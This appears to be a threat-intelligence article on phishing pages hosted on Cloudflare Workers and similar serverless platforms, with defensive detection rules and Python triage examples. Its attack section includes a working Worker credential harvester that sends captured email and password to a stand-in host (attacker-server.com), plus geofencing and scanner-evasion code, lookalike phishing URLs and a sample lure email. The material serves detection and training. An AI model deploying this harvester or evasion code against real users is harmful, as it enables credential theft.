Cloudflare Workers Phishing
Attackers abuse serverless platforms to host phishing pages; the page inherits Cloudflare's trusted reputation, automatic TLS and global edge infrastructure while being cheap and disposable.
MITRE ATT&CK: T1566.002 (Phishing: Spearphishing Link)
Timeline: The Cat and Mouse
2019 → Attack emerges → 2021 → Platform responds → 2024 → Arms race continues → Present
The Evolution
| Phase | Period | What Happened |
|---|---|---|
| ATTACK | 2019 | Workers abuse emerges; free tier + trusted domain exploited |
| PEAK | 2021-2023 | Mass adoption by phishing kits; Cloudflare Pages adds attack surface |
| RESPONSE | 2021 | Cloudflare adds automated abuse detection |
| | 2022 | Security vendors track workers.dev reputation |
| | 2023 | Some browsers warn on suspicious serverless URLs |
| ADAPTATION | 2024 | Custom domains, multi-platform (AWS Lambda, Azure Functions) |
| CURRENT | Present | Active cat-and-mouse; rapid rotation defeats detection |
Key Events with Sources
| Date | Event | Significance | Source |
|---|---|---|---|
| 2019 | Workers phishing emerges | Free serverless with trusted domain discovered by attackers | Trend Micro |
| 2020 | Cloudflare Pages adds risk | Additional attack surface with pages.dev | Cloudflare |
| 2021 | Cloudflare abuse detection | ML-based scanning for phishing patterns | Cloudflare |
| 2022 | Phishing kits support Workers | Commoditized attacks on serverless | Cofense |
| 2023 | Multi-platform abuse | AWS Lambda, Azure Functions, Vercel also targeted | Akamai |
Overview
As defenders got better at blocking traditional phishing infrastructure, attackers moved to serverless platforms. Cloudflare Workers offers free hosting, automatic TLS, edge deployment and, critically, inherits Cloudflare's trusted reputation. A phishing page on workers.dev looks legitimate, loads fast globally, and is trivial to deploy and replace.
The Attack
Why Serverless Phishing Works
Traditional Phishing Infrastructure:
1. Register domain (leaves paper trail)
2. Rent VPS hosting (costs money, requires account)
3. Configure web server (technical effort)
4. Get SSL certificate (extra steps)
5. Deploy phishing page
6. Get blocked after hours/days
7. Repeat from step 1
Serverless Phishing:
1. Sign up for Cloudflare (free, minimal verification)
2. Deploy Worker with phishing code
3. Active at unique-name.workers.dev
4. Automatic SSL, global CDN
5. Get blocked? Deploy new Worker in seconds
Cloudflare Workers Advantages for Attackers
| Feature | Legitimate Use | Attacker Abuse |
|---|---|---|
| Free tier | Testing, small projects | Unlimited phishing pages |
| workers.dev subdomain | Quick deployment | Trusted-looking URL |
| Automatic SSL | Security | Green padlock for phishing |
| Edge deployment | Performance | Fast globally |
| Serverless | No server management | No infrastructure to take down |
| Quick deployment | Developer agility | Replace blocked pages instantly |
Phishing URL Examples
```
# Cloudflare Workers
https://microsoft-login-verify.workers.dev
https://secure-dropbox-share.workers.dev
https://paypal-account-update.workers.dev
# Cloudflare Pages
https://office365-signin.pages.dev
https://google-drive-viewer.pages.dev
# Custom domain on a Cloudflare zone routed to a Worker (harder to detect: no workers.dev in the URL)
https://login.microsoft-support.net
```
Worker Code Example
```javascript
// Simple phishing credential harvester
// Cloned login-page markup (omitted here)
const PHISHING_HTML = "<!-- pixel-perfect copy of the target's login form -->";

export default {
  async fetch(request) {
    if (request.method === "POST") {
      // Capture credentials submitted by the victim
      const formData = await request.formData();
      const email = formData.get("email");
      const password = formData.get("password");
      // Exfiltrate to an attacker-controlled server (a Worker may fetch any origin)
      await fetch("https://attacker-server.com/collect", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ email, password, timestamp: Date.now() })
      });
      // Redirect to the real login page so the "failed" attempt looks like a glitch
      return Response.redirect("https://login.microsoft.com", 302);
    }
    // Serve the cloned login page on GET
    return new Response(PHISHING_HTML, {
      headers: { "Content-Type": "text/html" }
    });
  }
};
```
Advanced Techniques
Geofencing:
```javascript
// Only show phishing to the target region
// (request.cf is populated by Cloudflare at the edge; PHISHING_HTML as above)
export default {
  async fetch(request) {
    const country = request.cf.country;
    if (country !== "US") {
      // Show benign content to non-targets, including scanners outside the region
      return new Response("Coming soon!");
    }
    // Show phishing to US visitors
    return new Response(PHISHING_HTML);
  }
};
```
Bot Detection:
```javascript
// Evade security scanners
export default {
  async fetch(request) {
    // The header may be absent: default to an empty string and normalise case
    const ua = (request.headers.get("User-Agent") || "").toLowerCase();
    // Block known security scanners by User-Agent substring
    if (ua.includes("bot") || ua.includes("crawler") || ua.includes("scanner")) {
      return new Response("Page not found", { status: 404 });
    }
    // Drop requests from known security-vendor source IPs
    // (CF-Connecting-IP is the client IP as seen by Cloudflare; the lookup helper is not shown)
    const ip = request.headers.get("CF-Connecting-IP");
    if (await isKnownSecurityVendorIP(ip)) {
      return new Response("404", { status: 404 });
    }
    return new Response(PHISHING_HTML);
  }
};
```
Turnstile Integration:
```
// Abuse Cloudflare's own CAPTCHA (Turnstile)
// Forces human interaction before showing the phishing page
// Legitimate-looking, blocks automated scanners
```
Raw Email Headers (Serverless Phishing)
The phishing email links to a workers.dev URL; all email authentication (SPF, DKIM, DMARC) is for the attacker's own cousin domain, not Microsoft's:
```
Return-Path: <noreply@microsoft-notice.com>
Received: from mail.microsoft-notice.com (mail.microsoft-notice.com [198.51.100.77])
    by mx.victim.com (Postfix) with ESMTPS id WORK3R5
    for <user@victim.com>; Mon, 27 Jan 2025 11:22:33 -0500 (EST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
    d=microsoft-notice.com; s=mail;
    h=from:to:subject:date;
    bh=workers123...;
    b=phishing456...
Authentication-Results: mx.victim.com;
    dkim=pass header.d=microsoft-notice.com;
    spf=pass smtp.mailfrom=noreply@microsoft-notice.com;
    dmarc=pass (p=REJECT) header.from=microsoft-notice.com
From: "Microsoft Account Security" <security@microsoft-notice.com>
To: user@victim.com
Subject: [Action Required] Unusual Sign-in Activity Detected
Date: Mon, 27 Jan 2025 11:22:30 -0500
Message-ID: <phish-001@microsoft-notice.com>
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8

<html>
<body>
<p>We detected unusual sign-in activity on your account.</p>
<p>Please verify your identity immediately:</p>
<a href="https://ms-account-verify.workers.dev/login?id=abc123">
Verify Now
</a>
</body>
</html>
```
Key observations:
- dkim=pass, spf=pass, dmarc=pass: the cousin domain microsoft-notice.com is fully authenticated, which proves only that the mail really came from that domain
- Link points to workers.dev, Cloudflare's trusted infrastructure
- URL has a valid TLS certificate automatically (Cloudflare provides it)
- microsoft-notice.com looks legitimate at a glance
- Phishing page hosted on the edge: fast globally and disposable
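The message above, parsed the way an email-security rule would see it. This is an added example, not code from the original page: it uses only the Python standard library, a constructed copy of the message (trimmed to the relevant headers) plus a constructed genuine notice as a control, and it treats the serverless suffix list, the brand's real domains, the brand tokens and the verdict rule as assumptions. The point it makes is that the dkim/spf/dmarc results describe the sender's own domain, so they must be checked separately from where the links actually go.

```python
"""Separate sender authentication from link reputation for a phishing email.

Added example; not code from the original page. Standard library only.
Assumptions: the suffix, brand-domain and brand-token lists, and the verdict rule.
"""
import email
import email.utils
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample, trimmed from the headers and body shown on the page.
PHISH_EMAIL = """\
Return-Path: <noreply@microsoft-notice.com>
Authentication-Results: mx.victim.com;
 dkim=pass header.d=microsoft-notice.com;
 spf=pass smtp.mailfrom=noreply@microsoft-notice.com;
 dmarc=pass (p=REJECT) header.from=microsoft-notice.com
From: "Microsoft Account Security" <security@microsoft-notice.com>
To: user@victim.com
Subject: [Action Required] Unusual Sign-in Activity Detected
Message-ID: <phish-001@microsoft-notice.com>
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8

<html><body><p>We detected unusual sign-in activity on your account.</p>
<a href="https://ms-account-verify.workers.dev/login?id=abc123">Verify Now</a></body></html>
"""

# Constructed control: a genuine notice sent from a domain the brand owns.
LEGIT_EMAIL = """\
Authentication-Results: mx.victim.com;
 dkim=pass header.d=accountprotection.microsoft.com;
 spf=pass smtp.mailfrom=account-security-noreply@accountprotection.microsoft.com;
 dmarc=pass (p=REJECT) header.from=accountprotection.microsoft.com
From: "Microsoft account team" <account-security-noreply@accountprotection.microsoft.com>
To: user@victim.com
Subject: Unusual sign-in activity
Content-Type: text/html; charset=UTF-8

<html><body><a href="https://login.microsoft.com/">Review recent activity</a></body></html>
"""

# Assumptions: which suffixes count as serverless hosting, which domains the brand
# really owns, and which hostname tokens suggest brand impersonation.
SERVERLESS_SUFFIXES = (".workers.dev", ".pages.dev", ".vercel.app", ".netlify.app")
BRAND_DOMAINS = ("microsoft.com", "microsoftonline.com", "live.com")
BRAND_TOKENS = ("microsoft", "ms-", "office365", "o365")
CRED_PATH_WORDS = ("login", "signin", "verify", "account")


def owned_by_brand(host):
    # Exact match or a proper subdomain; "evilmicrosoft.com" must not pass.
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)


class _LinkExtractor(HTMLParser):
    """Collect href values of <a> tags in the HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href")
        if tag == "a" and href:
            self.links.append(href)


def analyze(raw):
    msg = email.message_from_string(raw, policy=policy.default)
    sender = email.utils.parseaddr(str(msg.get("From", "")))[1].rsplit("@", 1)[-1].lower()
    # dkim/spf/dmarc=pass only prove the mail came from the sender's own domain.
    auth = dict(re.findall(r"\b(dkim|spf|dmarc)=(\w+)", str(msg.get("Authentication-Results", ""))))
    impersonates = any(t in sender for t in BRAND_TOKENS) and not owned_by_brand(sender)

    extractor = _LinkExtractor()
    extractor.feed(msg.get_body(preferencelist=("html",)).get_content())
    links = []
    for href in extractor.links:
        u = urlparse(href)
        host = (u.hostname or "").lower()
        links.append({
            "host": host,
            "serverless": any(host.endswith(s) for s in SERVERLESS_SUFFIXES),
            "brand_token": any(t in host for t in BRAND_TOKENS) and not owned_by_brand(host),
            "cred_path": any(w in u.path.lower() for w in CRED_PATH_WORDS),
        })

    # Verdict rule (assumption): an authenticated cousin domain linking to a
    # credential-style or brand-named page on serverless hosting is phishing outright.
    hot = [l for l in links if l["serverless"] and (l["cred_path"] or l["brand_token"])]
    if impersonates and hot:
        verdict = "phishing"
    elif impersonates or hot:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"sender_domain": sender, "auth": auth, "impersonates": impersonates,
            "links": links, "verdict": verdict}


if __name__ == "__main__":
    for name, raw in (("phish", PHISH_EMAIL), ("legit", LEGIT_EMAIL)):
        print(name, analyze(raw)["verdict"])
```

Note that both messages pass DKIM, SPF and DMARC; the only things that separate them are whether the From domain is one the brand owns and where the link host lives. This is also the logic behind the email-analysis rule in the Detection Guidance section below.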
Attack Flow
```
+-------------------------------------------------------------+
| 1. PHISHING EMAIL                                           |
|                                                             |
|    From: security@microsoft-notice.com                      |
|    Subject: Action Required: Verify Your Account            |
|                                                             |
|    "Click here to verify your identity"                     |
|    Link: https://ms-account-verify.workers.dev              |
+-------------------------------------------------------------+
                              |
                              v
+-------------------------------------------------------------+
| 2. CLOUDFLARE WORKERS (Edge)                                |
|                                                             |
|    URL: https://ms-account-verify.workers.dev               |
|    ✓ Valid TLS certificate (automatic)                      |
|    ✓ Fast loading (CDN)                                     |
|    ✓ Trusted IP range (Cloudflare)                          |
|                                                             |
|    Worker serves pixel-perfect Microsoft login clone        |
+-------------------------------------------------------------+
                              |
                              v
+-------------------------------------------------------------+
| 3. CREDENTIAL CAPTURE                                       |
|                                                             |
|    User enters: user@company.com / Password123              |
|    Worker POSTs to: https://attacker-c2.com/harvest         |
|    User redirected to: https://login.microsoft.com          |
|                                                             |
|    User thinks login failed, tries real site, succeeds      |
|    Never realizes credentials were stolen                   |
+-------------------------------------------------------------+
```
Other Serverless Platforms Abused
| Platform | Domain | Free Tier |
|---|---|---|
| Cloudflare Workers | workers.dev | 100K requests/day |
| Cloudflare Pages | pages.dev | Unlimited sites |
| AWS Lambda + API Gateway | execute-api.amazonaws.com | 1M requests/month |
| Azure Functions | azurewebsites.net | 1M requests/month |
| Google Cloud Functions | cloudfunctions.net | 2M invocations/month |
| Vercel | vercel.app | 100GB bandwidth |
| Netlify | netlify.app | 100GB bandwidth |
Defenses
URL Reputation Updates
Security vendors now track serverless domains:
```
# Traditional reputation
evil-phishing-site.com → Blocked
# Updated to include serverless
*.workers.dev → Elevated scrutiny
*.pages.dev → Monitor for brand impersonation
*.vercel.app → Check for phishing patterns
```
Cloudflare's Response
Automated Scanning:
- Machine learning detection of phishing content
- Brand impersonation detection
- Known phishing kit signatures
Abuse Reporting:
- Faster takedown of reported Workers
- Integration with anti-phishing alliances
- Proactive scanning for credential harvesting
Browser Protections
Modern browsers check:
- Google Safe Browsing database
- Microsoft SmartScreen
- Proprietary URL reputation
Challenge: Workers can be deployed faster than databases update.
Enterprise Controls
DNS Filtering:
```
# Block Workers hostnames first seen in the last 24h. workers.dev names are not
# registered domains, so WHOIS age does not apply; use first-seen in your own DNS/proxy telemetry.
first_seen(*.workers.dev) < 24h → Block
# Block suspicious patterns
*login*.workers.dev → Block
*verify*.workers.dev → Block
*secure*.workers.dev → Block
```
Proxy Inspection:
- TLS inspection to see Worker content
- Keyword detection (login, password, verify)
- Brand logo detection
Attacker Adaptation
Subdomain Randomization
```
# Avoid pattern-based blocking
https://x7k2m9p.workers.dev
https://a1b2c3d4e5.workers.dev
# Use legitimate-sounding but random
https://document-share-2847.workers.dev
```
Custom Domains
Route through custom domains to hide workers.dev:
```
# Attacker registers: microsoft-support.net
# Adds it as a Cloudflare zone and routes it to the Worker
https://login.microsoft-support.net → Worker backend (no workers.dev in the URL)
# Hides the serverless indicator
```
Rapid Rotation
When detected, deploy new Worker immediately:
```
# Attacker automation (pseudocode)
for target_batch in victims:
    worker_url = deploy_new_worker()
    send_phishing_campaign(target_batch, worker_url)
    sleep(random(10, 30))  # minutes
    delete_worker()
```
Multi-Stage Redirects
```
Email Link → Legitimate shortener → Cloudflare Worker → Phishing page
             (t.co, bit.ly)
# Each hop makes detection harder
# Shortener sees a Workers URL (not obviously bad)
# Worker serves phishing (new URL each campaign)
```
Current State
Status: Active
Serverless phishing continues to grow:
| Trend | Impact |
|---|---|
| Phishing kits include Workers support | Democratized attack |
| Detection improving | Arms race continues |
| Multi-platform abuse | Canβt block one provider |
| Custom domain fronting | Harder to detect |
Detection Guidance
Email Analysis
Flag emails containing:
```
url.domain MATCHES (
    "*.workers.dev",
    "*.pages.dev",
    "*.vercel.app",
    "*.netlify.app"
)
AND email.is_external = true
AND url.path CONTAINS ("login", "signin", "verify", "account")
```
URL Inspection
Before allowing access:
- Check when the hostname was first seen (for a custom domain, also its registration age)
- Look for brand impersonation in the subdomain
- Inspect page content for credential forms
- Check the TLS certificate (a wildcard for *.workers.dev is not a certificate issued to the brand)
User Training
Educate users:
- Legitimate Microsoft sign-in happens on login.microsoft.com or login.microsoftonline.com, never on *.workers.dev
- Check the full URL, not just the padlock
- Be suspicious of emails with unfamiliar domains
- When in doubt, navigate directly to the service
Network Monitoring
Track access to serverless domains:
```
# Alert on unusual serverless domain access
dst.domain IN serverless_providers
AND user.department = "Finance"
AND dst.url.path CONTAINS "login"
```
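The DNS-filtering rules under Enterprise Controls, the URL-inspection checklist and the network-monitoring rule above combined into one scoring pass over proxy log records. This is an added example, not code from the original page: it runs offline over constructed log lines and a constructed first-seen table, and the log format, the suffix/brand/path lists, the scoring weights and the block/alert thresholds are all assumptions. It goes one step beyond the rules as written by including a Worker fronted by a custom domain, which the suffix rule alone misses but which the first-seen and brand-token signals still catch.

```python
"""Score proxy-log URL visits for serverless-phishing indicators.

Added example; not code from the original page. Runs offline over constructed input.
Assumptions: log format, first-seen table, suffix/brand/path lists, weights, thresholds.
"""
from datetime import datetime, timedelta
from urllib.parse import urlparse

SERVERLESS_SUFFIXES = (".workers.dev", ".pages.dev", ".vercel.app", ".netlify.app",
                       ".azurewebsites.net", ".cloudfunctions.net")
BRAND_DOMAINS = ("microsoft.com", "microsoftonline.com", "live.com",
                 "dropbox.com", "paypal.com", "google.com")
BRAND_TOKENS = ("microsoft", "ms-", "office365", "o365", "dropbox", "paypal", "google")
CRED_PATH_WORDS = ("login", "signin", "verify", "account")
SENSITIVE_DEPTS = {"Finance", "Executive"}
NOW = datetime(2025, 1, 27, 11, 30)

# Constructed: when each hostname was first seen in the org's own DNS/proxy telemetry.
# workers.dev names are not registered domains, so WHOIS age is meaningless for them;
# first-seen in your own data is the usable substitute.
FIRST_SEEN = {
    "ms-account-verify.workers.dev": datetime(2025, 1, 27, 10, 50),
    "login.microsoft-support.net": datetime(2025, 1, 26, 22, 0),
    "docs.example-corp.workers.dev": datetime(2024, 3, 1),
    "login.microsoft.com": datetime(2019, 1, 1),
}

# Constructed proxy log: timestamp user department url
PROXY_LOG = """\
2025-01-27T11:25:10Z alice Finance https://ms-account-verify.workers.dev/login?id=abc123
2025-01-27T11:26:42Z bob Engineering https://docs.example-corp.workers.dev/
2025-01-27T11:27:05Z carol Finance https://login.microsoft-support.net/common/oauth2/verify
2025-01-27T11:28:30Z dave Finance https://login.microsoft.com/common/oauth2/authorize
"""


def owned_by_brand(host):
    # Exact match or proper subdomain only; "evilmicrosoft.com" must not pass.
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)


def is_serverless(host):
    # API Gateway hosts look like <id>.execute-api.<region>.amazonaws.com
    return any(host.endswith(s) for s in SERVERLESS_SUFFIXES) or ".execute-api." in host


def score_url(url, department, now=NOW):
    """Return (score, reasons) for one visit. Weights are assumptions."""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    if owned_by_brand(host):
        return 0, ["allowlisted brand domain"]
    score, reasons = 0, []

    def hit(points, why):
        nonlocal score
        score += points
        reasons.append(why)

    if is_serverless(host):
        hit(2, "serverless hosting")
    if any(t in host for t in BRAND_TOKENS):
        hit(2, "brand token in hostname")
    first = FIRST_SEEN.get(host)
    if first is None:
        hit(1, "never seen before")
    elif now - first < timedelta(hours=24):
        hit(2, "first seen <24h ago")
    if any(w in u.path.lower() for w in CRED_PATH_WORDS):
        hit(1, "credential-style path")
    if department in SENSITIVE_DEPTS:
        hit(1, "sensitive department")
    return score, reasons


def verdict(score):
    # Thresholds are assumptions; tune against your own false-positive rate.
    return "block" if score >= 5 else "alert" if score >= 3 else "allow"


def triage(log=PROXY_LOG):
    """Parse the constructed log and score every visit."""
    rows = []
    for line in log.splitlines():
        ts, user, dept, url = line.split()
        score, reasons = score_url(url, dept)
        rows.append({"time": ts, "user": user, "host": urlparse(url).hostname,
                     "score": score, "verdict": verdict(score), "reasons": reasons})
    return rows


if __name__ == "__main__":
    for row in triage():
        print(row["verdict"], row["score"], row["user"], row["host"], row["reasons"])
```

The third record is the custom-domain case: login.microsoft-support.net never trips the serverless suffix check, yet it still scores high because the brand token, the recent first-seen time, the credential-style path and the Finance user stack up. The second record shows why a bare "block everything on workers.dev" rule is too blunt: an unremarkable, long-known Workers host used by engineering scores only the hosting points and is allowed.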
Incident Response
When serverless phishing detected:
- Report to platform abuse team
- Block specific Worker URL
- Check if employees visited
- Reset credentials if accessed
- Add indicators to blocklist
What Killed It (or Weakened It)
| Defense | Introduced | Impact |
|---|---|---|
| Cloudflare Abuse Detection | 2021 | Automated scanning for known phishing patterns |
| URL Reputation for Serverless | 2022 | Security vendors track workers.dev and pages.dev reputation |
| Browser Warnings | 2023 | Some browsers warn on suspicious serverless URLs |